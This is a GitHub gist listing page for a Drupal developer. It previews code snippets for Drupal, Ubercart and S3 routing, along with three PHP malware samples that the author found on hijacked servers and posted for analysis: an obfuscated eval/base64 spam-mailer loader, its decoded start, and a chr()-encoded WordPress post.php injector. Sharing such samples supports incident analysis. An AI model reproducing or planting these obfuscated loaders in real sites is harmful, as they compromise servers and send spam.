Skip to content

Instantly share code, notes, and snippets.

Bronius Motekaitis bronius

Block or report user

Report or block bronius

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@bronius
bronius / gist:92393784768bc531eca95fb55f68d3d2
Last active Jun 25, 2018
Super fast replacement for field_encrypt_views_query_alter in contrib module https://www.drupal.org/project/field_encrypt_views_filters
View gist:92393784768bc531eca95fb55f68d3d2
<?php
// The original project query_alter takes each encrypted field with a value sought out of the query
// Executes a query of all other fields (or none if none)
// Creates a MySQL temporary table and populates with decrypted fields' values
// Adds that temp table as a join on the original View
// And then executes the view, letting MySQL query against that temporary table of decrypted values.
//
// This approach expects a parallel field, field_name_md5, to contain an md5 hash of the original,
// decrypted value (CRUD updated with entity/node hooks or as calculated field). At query execution,
@bronius
bronius / dpatch.py
Created Apr 18, 2017 — forked from nvahalik/dpatch.py
Drupal patch maker
View dpatch.py
#!/usr/local/bin/python
import json
import re
import urllib2
import subprocess
class Issue:
def __init__(self, number):
self.number = number
@bronius
bronius / Rewrite rules for Windows DDay with Click Once installer update over Amazon AWS S3 static web hosting
Created Jan 18, 2017
Running into issues with a .Net project's ability to pull its DDay deployed Click Once installer update files hosted on Amazon S3 static website due to mysterious 404. The original manifest was pulled, and the app prompts to download update, but the update failed with 404. Turns out the subsequent requests made with superfluous forward slash ("/…
View Rewrite rules for Windows DDay with Click Once installer update over Amazon AWS S3 static web hosting
<RoutingRules>
<RoutingRule>
<Condition>
<KeyPrefixEquals>//</KeyPrefixEquals>
</Condition>
<Redirect>
<ReplaceKeyPrefixWith>/</ReplaceKeyPrefixWith>
</Redirect>
</RoutingRule>
</RoutingRules>
@bronius
bronius / search.php
Last active Jan 27, 2016
Translated from https://gist.github.com/bronius/5328431878e564bbc29a. The decoded output that gets run in an eval() in this nasty spammer script on my hijacked server. It looks like it gets called by remote spambots, but not yet sure what the request payload is to make it tick.
View search.php
<?php
// Note this is the result of a var_dump, so you should see two lines like:
// string(109877) "
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER))
{
@bronius
bronius / search.php
Last active Jan 27, 2016
Translation at https://gist.github.com/bronius/7d1fada81be055fde636. Another nasty script. It is an obfuscated bunch of garbled gibberish which translates itself and then, in an eval(), acts as a pretty sophisticated, smtp-authenticated spam emailer. Here's the original source as found in a file on a VPS I manage (same cPanel account as before..…
View search.php
<?php
// Look at the bottom of this script. What was an eval() I've put into a var_dump() so you can see the script this contains
// Copy/paste this in its entirety (minus the opening ?php tag) at http://sandbox.onlinephpfunctions.com/, and you
// will see the resulting code without it executing anything malicious.
function ntjmfak($ixdtwpth, $anmcarey){$qq = ''; for($i=0; $i < strlen($ixdtwpth); $i++){$qq .= isset($anmcarey[$ixdtwpth[$i]]) ? $anmcarey[$ixdtwpth[$i]] : $ixdtwpth[$i];}
$rzqwohzj="base64_decode";return $rzqwohzj($qq);}
$efl = 'YGyrI01f7pYts80KdV1Kp83W7Kd6bUz0nULqTLqPIkzqpvJySjQHAG1Hp80KdV1KdKd6bRPqTLqPIkzqpvJySjQH'.
'AkM5p8057kJZSGyWAy1aIkZysKLQ9jNwjNif7pelSGyh7016IkZqSjQLCn6CjVyVCGyfd80aCjelFa0E0N0ECENCOLtssM1ne0sk'.
@bronius
bronius / post.php
Last active Nov 11, 2015
A nefarious script found on a WordPress site. It's obfuscated at least a couple layers deep. In your access_log you should see POST /post.php, and your themes' header.php files will get a little javascript injected which appears to just make a call out to some remote websites. How is this good for anyone? Please give it a whirl at http://sandbox…
View post.php
// Found this in a post.php in a hacked WordPress site. Just wanting to see how this evaluates.
$sDo80i4="p".chr(114)."e".chr(103).chr(95)."\x72".chr(101)."\x70".chr(108)."a\x63\x65";
$xm3MTJ="\x65v\x61".chr(108)."(\x62".chr(97).chr(115).chr(101).chr(54)."4\x5F\x64\x65c\x6Fd".chr(101)."\x28".chr(34)."\x51GVy".chr(99)."\x6d9\x79".chr(88).chr(51)."\x4a\x6c\x63\x47\x39\x79\x64".chr(71).chr(108)."\x75\x5a".chr(121)."gw".chr(75)."T\x73\x4e".chr(67).chr(107)."\x42\x70\x62m\x6c".chr(102)."\x632".chr(86)."\x30K".chr(67).chr(74).chr(107).chr(97).chr(88)."N\x77b".chr(71).chr(70).chr(53)."\x58\x32".chr(86)."\x79\x63".chr(109)."9\x79\x63yI\x73M".chr(67)."k\x37".chr(68)."\x51\x70\x41\x61\x575\x70X".chr(51)."N\x6cdC\x67ib".chr(71)."\x39".chr(110)."\x58".chr(50)."\x56y\x63m".chr(57).chr(121)."\x63".chr(121)."IsM".chr(67)."k".chr(55)."\x44Q\x70\x41".chr(97).chr(87)."\x35".chr(112)."X\x33".chr(78)."\x6c".chr(100)."\x43g\x69\x5a".chr(88)."J".chr(121)."b3".chr(74)."\x66\x62\x47".chr(57).chr(110)."\x49\x69ww\x4b\x54s\x4E\x43\x67
@bronius
bronius / megaselect.module
Created Feb 10, 2014
Attempt to nest Drupal 7 FAPI element type tableselect (Note: It doesn't work!)
View megaselect.module
<?php
/**
* @file megaselect.module
* TODO: Enter file description here.
*/
/**
* Implements hook_menu().
*/
@bronius
bronius / gist:6371145
Last active Dec 21, 2015 — forked from neclimdul/gist:6370758
One way around Drupal 7 Ubercart 7.x-3.5 cache anonymous cart (in IE?). I found that 'cart' was always getting added to Drupal's cache_page table. Doesn't it make sense that it *not*? In fact, it broke checkout for our anonymous users. Try it out, let me know if it works for you. Thanks @neclimdul! Note: the fix is just the 'cart' -> drupal_page…
View gist:6371145
/**
* Implements hook_init().
*/
function uc_cart_init() {
global $conf;
$conf['i18n_variables'][] = 'uc_cart_breadcrumb_text';
$conf['i18n_variables'][] = 'uc_cart_help_text';
$conf['i18n_variables'][] = 'uc_continue_shopping_text';
// Don't cache any cart of checkout pages.
You can’t perform that action at this time.